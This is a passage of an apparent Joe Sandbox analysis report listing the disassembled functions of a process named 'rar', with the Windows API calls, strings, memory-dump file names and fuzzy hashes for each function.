                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AEE9
                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF01
                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF19
                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AF75
                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3AFB0
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B23B
                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B244
                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF629AF2E4C), ref: 00007FF629B3B287
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                              • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                              • API String ID: 3483800833-4165214152
                                                              • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                              • Instruction ID: 73ddcc5efddaeace6bc4384ae31165ddfe055970f187afffc4b3c856f04c9d8a
                                                              • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                              • Instruction Fuzzy Hash: D4C18C22A19A8A86EF10EF22EC502FE37A0FB86B95F440135DA4D87799DF3CE505D701
                                                              Function 00007FF629B0E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E298
                                                              • FindClose.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E2AB
                                                              • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E2F7
                                                                • Part of subcall function 00007FF629B0EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF73
                                                                • Part of subcall function 00007FF629B0EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF84
                                                                • Part of subcall function 00007FF629B0EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF629B0EFA7
                                                                • Part of subcall function 00007FF629B0EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF629B0EFCA
                                                                • Part of subcall function 00007FF629B0EF50: GetLastError.KERNEL32 ref: 00007FF629B0EFD4
                                                                • Part of subcall function 00007FF629B0EF50: CloseHandle.KERNEL32 ref: 00007FF629B0EFE7
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B0E357
                                                              • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF629AF2014), ref: 00007FF629B0E362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID: SeBackupPrivilege
                                                              • API String ID: 3094086963-2429070247
                                                              • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                              • Instruction ID: b025e8e681e76cf97e464685f6c5b3c87aad954fed80941c5fde377eedbdf88b
                                                              • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                              • Instruction Fuzzy Hash: CF61D236A1864686EF248F21E9402FE3360FB86799F404239DB6E976D4DF3CE145E702
                                                              Function 00007FF629B2AF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Sleepswprintf
                                                              • String ID: $%ls%0*u.rev
                                                              • API String ID: 407366315-3491873314
                                                              • Opcode ID: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                              • Instruction ID: 8122ee4a4e160657023ab1bd96a0b6740bc15c151a77c02f6e5ad24a94da0c69
                                                              • Opcode Fuzzy Hash: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
                                                              • Instruction Fuzzy Hash: AD02F132E0469686EF20DF26D8542AE73A5FBCA785F40013ADE5D8BB99DE3CE441D701
                                                              Function 00007FF629AF49B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • new.LIBCMT ref: 00007FF629AF4BD8
                                                                • Part of subcall function 00007FF629B3B6D0: Sleep.KERNEL32(?,?,?,?,00007FF629B0CBED,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B3B730
                                                                • Part of subcall function 00007FF629B11E80: CreateFileW.KERNELBASE ref: 00007FF629B11F4A
                                                                • Part of subcall function 00007FF629B11E80: GetLastError.KERNEL32 ref: 00007FF629B11F59
                                                                • Part of subcall function 00007FF629B11E80: CreateFileW.KERNELBASE ref: 00007FF629B11F99
                                                                • Part of subcall function 00007FF629B11E80: GetLastError.KERNEL32 ref: 00007FF629B11FA2
                                                                • Part of subcall function 00007FF629B11E80: SetFileTime.KERNEL32 ref: 00007FF629B11FF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$SleepTime
                                                              • String ID: %12s %s$%12s %s$ $%s
                                                              • API String ID: 2965465231-221484280
                                                              • Opcode ID: 05a7e0e299e76d3b599cecb2db35fae30976aa6c46bd72ff832a0ef8c8ec7fe1
                                                              • Instruction ID: 5451078557c3eb9e69904f9499193867b86e488ee7d0074b79f3b4b45b863256
                                                              • Opcode Fuzzy Hash: 05a7e0e299e76d3b599cecb2db35fae30976aa6c46bd72ff832a0ef8c8ec7fe1
                                                              • Instruction Fuzzy Hash: CAF1BA22B09A4686EF60DF12D8582BE73A0FB86B88F444035DE4D87786DF3ED555E702
                                                              Function 00007FF629B54C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                              • Instruction ID: 913352eae891dacc841e64cf9224aa7c05bb6e4ef6d708a498b8bec826e747ca
                                                              • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                              • Instruction Fuzzy Hash: 62318036608B8586DB60CF25EC502AE73A0FBC975AF500139EA8D93B98DF3CD555DB01
                                                              Function 00007FF629B0EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID:
                                                              • API String ID: 3398352648-0
                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                              • Instruction ID: 362c3299bd5b9acbbd214fe102ef8c68a8ca82e0433a1f88ef6911673db9483b
                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                              • Instruction Fuzzy Hash: D611303261874A86EB508F22E85056F77A4FBC9F81F545535EA8E83668DF3CE005DB41
                                                              Function 00007FF629AF42E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 3116915952-0
                                                              • Opcode ID: b44cecc4538195ef80268b9e7976b6d807d072f57678e8aa8dc27d297b8f3769
                                                              • Instruction ID: 5e2318e3f5767fd96613153c27c1d8b8e6ded39c3d8e0713263553129db015a7
                                                              • Opcode Fuzzy Hash: b44cecc4538195ef80268b9e7976b6d807d072f57678e8aa8dc27d297b8f3769
                                                              • Instruction Fuzzy Hash: E9E16E22A08B8682EE20EF25D8541FE73A5FBC6788F455032DE4E8B796DE3DE505D701
                                                              Function 00007FF629B13A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13AC4
                                                              • CreateFileW.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13B0A
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B13B55
                                                              • CloseHandle.KERNEL32(?,?,?,00007FF629B111B0,?,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B13B60
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$CloseControlDeviceHandle
                                                              • String ID:
                                                              • API String ID: 998109204-0
                                                              • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                              • Instruction ID: 9d170b929a54d14e17b7bf56aafa0ee060a51709c6db023952e9c8c17b369b43
                                                              • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                              • Instruction Fuzzy Hash: F1318132618B8586EB608F12B84469B77A4FBCA7E4F000235EAAD43BD4DF3CD5559B00
                                                              Function 00007FF629B13144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1705453755-0
                                                              • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                              • Instruction ID: cf56cf3ec5a5d34528468f151de9c5193fafd9645f1636558ec8634d62fabb4e
                                                              • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                              • Instruction Fuzzy Hash: C7011B22A2868586EF70DF15E8513AF73A1FB86745F800121E68CC6988EE7CD604EF41
                                                              Function 00007FF629B56130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                              • API String ID: 3215553584-2617248754
                                                              • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                              • Instruction ID: 0e61ca03d0b3f629b909870988ee59a84fbb9108bdfb99c97052b39034ddb86d
                                                              • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                              • Instruction Fuzzy Hash: F541A972A09B4989EB04CF65EC417EE37A5EB4A388F00413AEE5C87B95DE38E025D345
                                                              Function 00007FF629B07988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Console$Mode$Handle$Readfflush
                                                              • String ID:
                                                              • API String ID: 1039280553-0
                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                              • Instruction ID: 01aa6c2547c23467954dceb769952a01e2023adecd8f210caab6008caa60b5af
                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                              • Instruction Fuzzy Hash: 32218026B1864B97EF009F26AD4417E6361FBCABA3F140234EE4A57B64DE3CE446D701
                                                              Function 00007FF629B40140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
